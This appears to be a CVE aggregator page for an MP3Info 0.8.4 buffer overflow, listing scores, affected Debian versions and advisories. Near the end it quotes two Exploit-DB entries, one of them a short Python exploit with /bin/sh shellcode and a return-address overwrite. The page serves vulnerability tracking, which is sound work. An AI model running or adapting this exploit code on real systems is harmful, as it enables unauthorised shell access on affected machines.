CVE-2006-2465
published 2006-05-19CVE-2006-2465: Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or…
PriorityP427medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
5.39%
91.7th percentile
Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or setgid in any reasonable context, then this issue might not be a vulnerability.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | mp3info | < mp3info 0.8.4-9.1 (bookworm) | mp3info 0.8.4-9.1 (bookworm) |
| mp3info | mp3info | — | — |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
CVSS provenance
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
osv5.1MEDIUM
vendor_debian5.1LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cm74-95vp-cwf5: Buffer overflow in MP3Info 0
ghsa_unreviewed·2022-05-01
CVE-2006-2465 [MEDIUM] GHSA-cm74-95vp-cwf5: Buffer overflow in MP3Info 0
Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or setgid in any reasonable context, then this issue might not be a vulnerability.
OSV
CVE-2006-2465: Buffer overflow in MP3Info 0
osv·2006-05-19·CVSS 5.1
CVE-2006-2465 [MEDIUM] CVE-2006-2465: Buffer overflow in MP3Info 0
Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or setgid in any reasonable context, then this issue might not be a vulnerability.
Debian
CVE-2006-2465: mp3info - Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via ...
vendor_debian·2006·CVSS 5.1
CVE-2006-2465 [MEDIUM] CVE-2006-2465: mp3info - Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via ...
Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or setgid in any reasonable context, then this issue might not be a vulnerability.
Scope: local
bookworm: resolved (fixed in 0.8.4-9.1)
bullseye: resolved (fixed in 0.8.4-9.1)
forky: resolved (fixed in 0.8.4-9.1)
sid: resolved (fixed in 0.8.4-9.1)
trixie: resolved (fixed in 0.8.4-9.1)
No detection rules found.
Exploit-DB
MP3Info 0.8.5a - Local Buffer Overflow (SEH)
exploitdb·2014-03-19
CVE-2006-2465 MP3Info 0.8.5a - Local Buffer Overflow (SEH)
MP3Info 0.8.5a - Local Buffer Overflow (SEH)
---
# Exploit Title: mp3info SEH exploit
# Date: 18 March 2014
# Exploit Author: Ayman Sagy
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: https://www.exploit-db.com/apps/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465
# Original POC: http://www.exploit-db.com/exploits/31220/
#
# The process memory region starts with a null byte but exploitation is still possible because of
# the little endian architecture provided that the return address gets placed at the end of the buffer,
# this however confines us in the tiny 4-byte area after pop/pop/retn
# Using a couple of trampolines I jumped back to the beginning of the buffer which is 533 by
Exploit-DB
MP3Info 0.8.5a - Buffer Overflow
exploitdb·2014-01-27
CVE-2006-2465 MP3Info 0.8.5a - Buffer Overflow
MP3Info 0.8.5a - Buffer Overflow
---
# Waste of CPU clock N2
# Exploit for: mp3info! Latest version
# Author: jsacco - [email protected]
# Vendor: http://ibiblio.org/mp3info/
# No-one-cares-about programs!
junk = "\x90\x90\x90\x90"*8
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
buffer = "\x90\x90\x90\x90"*89
eip = "\x10\xf0\xff\xbf"
print "# MP3info is prone to a Stack-BoF"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"
try:
subprocess.call(["mp3info", junk+shellcode+buffer+eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "MP3Info not found!"
else:
print "Error executing exploit"
raise
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/30945http://packetstormsecurity.com/files/124955/Mp3info-Stack-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/125786/MP3Info-0.8.5-SEH-Buffer-Overflow.htmlhttp://securitytracker.com/id?1016108http://www.exploit-db.com/exploits/32358http://www.securiteam.com/exploits/5GP0E15IKO.htmlhttp://www.securityfocus.com/bid/18016http://osvdb.org/show/osvdb/30945http://packetstormsecurity.com/files/124955/Mp3info-Stack-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/125786/MP3Info-0.8.5-SEH-Buffer-Overflow.htmlhttp://securitytracker.com/id?1016108http://www.exploit-db.com/exploits/32358http://www.securiteam.com/exploits/5GP0E15IKO.htmlhttp://www.securityfocus.com/bid/18016
2006-05-19
Published